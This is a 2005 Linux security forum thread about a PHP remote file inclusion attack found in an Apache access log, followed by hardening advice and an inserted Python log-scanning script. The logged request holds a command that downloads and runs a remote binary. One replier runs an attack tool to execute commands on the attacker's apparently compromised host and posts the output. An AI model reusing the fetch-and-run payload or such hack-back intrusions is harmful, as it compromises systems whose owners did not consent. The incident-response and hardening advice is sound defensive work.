LinuxQuestions.org

Linux - Security: access_log compromise ?? (https://www.linuxquestions.org/questions/linux-security-4/access_log-compromise-393978/)

lawadm1 12-17-2005 04:20 PM

access_log compromise ??
 
I saw a similar post yesterday, only one of my entries had a 200 status.

Can anyone tell me what they were able to accomplish, or what I need to look for?

24.70.88.18 - - [16/Dec/2005:19:23:50 -0600] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=
com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://81.174.26.111/cmd.gif?&cmd=
cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 200 683 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
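
As an added example (not code from this thread), here is a small Python checker that runs over access_log lines like the one above, URL-decodes each query parameter and flags the three tells in that request: a URL handed to a path parameter (mosConfig_absolute_path), superglobal overrides that only work with register_globals on, and shell commands inside a parameter. The sample lines are constructed; the first is the quoted entry re-joined onto one line.

```python
import re
from urllib.parse import unquote

# Constructed sample access_log lines: the first is the entry quoted in the thread,
# re-joined onto one line; the other two are made up for contrast.
SAMPLE_LOG = """\
24.70.88.18 - - [16/Dec/2005:19:23:50 -0600] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 200 683 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
10.0.0.5 - - [16/Dec/2005:19:24:01 -0600] "GET /index.php?option=com_content&id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.6 - - [16/Dec/2005:19:25:13 -0600] "GET /index2.php?mosConfig_absolute_path=http://203.0.113.9/x.txt? HTTP/1.1" 404 210 "-" "-"
"""

# Apache combined log: client, identd, user, [timestamp], "request", status, bytes, ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')
REMOTE_URL = re.compile(r'^(https?|ftp)://', re.I)
SHELL_CMD = re.compile(r'\b(wget|curl|chmod|cd)\s+\S')  # fetch/chmod/cd with an argument

def split_query(target):
    """Yield (name, decoded value) pairs; split on '&' only so ';' in payloads survives."""
    for part in target.partition('?')[2].split('&'):
        if part:
            name, _, value = part.partition('=')
            yield unquote(name), unquote(value)

def analyze(line):
    """Return a finding dict for one log line, or None if unparseable or unremarkable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    indicators = set()
    for name, value in split_query(m['target']):
        if REMOTE_URL.match(value):
            # A URL fed to a path/include parameter: the remote file inclusion pattern.
            indicators.add(f'remote_url_in:{name}')
        if '_REQUEST[' in name or name == 'GLOBALS':
            # Overwriting superglobals from the query string relies on register_globals = On.
            indicators.add('register_globals_override')
        if SHELL_CMD.search(value):
            indicators.add(f'shell_command_in:{name}')
    if not indicators:
        return None
    status = int(m['status'])
    # A 2xx means the script ran to completion, so the verdict needs host-side checks
    # (ps, netstat, /tmp) that the log alone cannot provide.
    return {'ip': m['ip'], 'time': m['ts'], 'status': status,
            'indicators': sorted(indicators), 'needs_host_check': 200 <= status < 300}

def scan(log_text):
    """Run analyze() over every line and keep only the findings."""
    return [f for f in map(analyze, log_text.splitlines()) if f]
```

Calling `scan(SAMPLE_LOG)` reports the quoted request with all three indicators and `needs_host_check` set, and the 404 probe with only the remote URL indicator.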

neo77777 12-17-2005 06:53 PM

They are trying to exploit PHP code and install an IRC bot. Disable global variables and turn safe_mode on in php.ini.

neo77777 12-17-2005 06:59 PM

Also, look through ps and netstat output; if you were compromised, the listen process will show up in your ps. Look in /tmp and see if the listen binary is there. Remember, if your webserver is running as root, the exploiter owns your system, and could've installed rootkits, etc. to hide his presence - the only remedy is to unplug your system from the network, analyze it, and most probably do a clean re-install.

lawadm1 12-17-2005 07:36 PM

The webserver is running under the apache id. And the only thing in /tmp is:
keyring-1TvKkp
mapping-root

nic0 12-17-2005 08:01 PM

Code:

nic0@nic0:~$ ./aw 24.70.88.18 * "ps -ef|grep httpd" 3
[*] Output by 24.70.88.18:


root      6698    1  0 Nov18 ?        00:00:14 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun  21918  6698  0 Dec15 ?        00:00:03 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun  21923  6698  0 Dec15 ?        00:00:02 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun  21940  6698  0 Dec15 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun  28790  6698  0 Dec15 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun  24770  6698  0 Dec16 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun  26319  6698  0 Dec16 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun    6914  6698  0 Dec16 ?        00:00:02 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun  13901  6698  0 12:22 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun  24139  6698  0 17:06 ?        00:00:01 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun  26687  6698  0 17:17 ?        00:00:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun    7104  7083  0 18:05 ?        00:00:00 sh -c echo SILENTIUM;ps -ef|grep httpd;echo

nic0@nic0:~$

yeah.. he is running apache.


l337 hax0rs should make sure their computer is secure first. ;)

lawadm1 12-17-2005 08:43 PM

Holy smokes. How do I make sure that can't be done to my machine?

Also, what will disabling global variables and turning safe mode on do?

nic0 12-17-2005 08:59 PM

Disabling global variables stops people from entering their own variables into a request.
In general, turning it off increases security a lot.

PHP Safe mode disables a lot of functions that remote users could exploit.

lawadm1 12-17-2005 11:24 PM

So in /etc/php.ini if I have:

register_globals = Off
safe_mode = On

Then this should help a bit?

nic0 12-17-2005 11:40 PM

Yep - this will improve your PHP security a lot. I also recommend getting a security scanner and checking for common vulnerabilities. Something like Nessus or Amap.
